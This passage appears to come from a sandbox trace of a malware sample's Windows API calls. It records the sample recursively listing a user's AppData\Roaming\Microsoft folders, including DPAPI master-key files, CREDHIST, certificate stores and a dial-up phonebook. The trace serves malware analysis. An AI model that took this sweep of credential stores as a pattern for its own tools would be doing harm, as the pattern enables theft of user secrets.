hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.674] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.674] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.674] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.674] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0057.674] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.674] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0057.674] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.675] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0057.675] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0057.675] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.675] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.675] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.675] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0057.675] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0057.675] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07318 [0057.675] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.676] FindNextFileW (in: hFindFile=0xb07318, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.676] FindClose (in: hFindFile=0xb07318 | out: hFindFile=0xb07318) returned 1 [0057.676] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.676] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0057.676] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0057.676] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07558 [0057.677] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.677] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.677] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.677] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.677] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0057.677] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.677] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.677] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.677] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.677] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.677] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0057.678] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.678] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.678] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.678] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0057.678] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0057.678] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.678] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.678] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.678] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0057.678] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0057.679] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.679] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.679] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.679] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.679] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.679] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.679] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.679] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.680] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.680] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC" [0057.680] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*" [0057.680] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.680] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.680] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.680] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.680] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.680] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network" [0057.682] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*" [0057.682] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.682] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.682] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.682] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0057.682] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0057.682] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.682] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.683] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.683] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0057.683] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0057.683] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07418 [0057.683] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.683] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.683] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0057.683] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0057.683] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07558 [0057.684] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.684] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.684] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0057.684] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.684] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.684] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.684] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.684] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.684] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.684] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.685] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.685] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.685] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect" [0057.685] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*" [0057.685] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.685] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.685] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.685] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0057.685] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.685] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000" [0057.685] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0057.685] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.686] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.686] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.686] PathMatchSpecW (pszFile="0e76ac85-01bf-412c-91a2-cef2eedde61a", pszSpec="*") returned 1 [0057.686] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.686] PathMatchSpecW (pszFile="1c8a6982-c4e6-4629-889a-0618a9675336", pszSpec="*") returned 1 [0057.686] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.686] PathMatchSpecW (pszFile="1cb7f609-08bd-4986-8a90-4f6e24f5d8cc", pszSpec="*") returned 1 [0057.686] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.686] PathMatchSpecW (pszFile="491bb34f-16c1-4bee-9f8c-432483187207", pszSpec="*") returned 1 [0057.686] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.686] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0057.686] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.686] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.687] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.687] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0057.687] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.687] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.687] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.687] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0057.687] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0057.687] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.687] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.687] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.687] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0057.688] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0057.688] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07218 [0057.688] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.688] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.688] PathMatchSpecW (pszFile="AppContainerUserCertRead", pszSpec="*") returned 1 [0057.688] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.688] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0057.688] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0057.688] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.688] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.688] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.688] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.689] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.689] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0057.689] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\WI2yhmtI 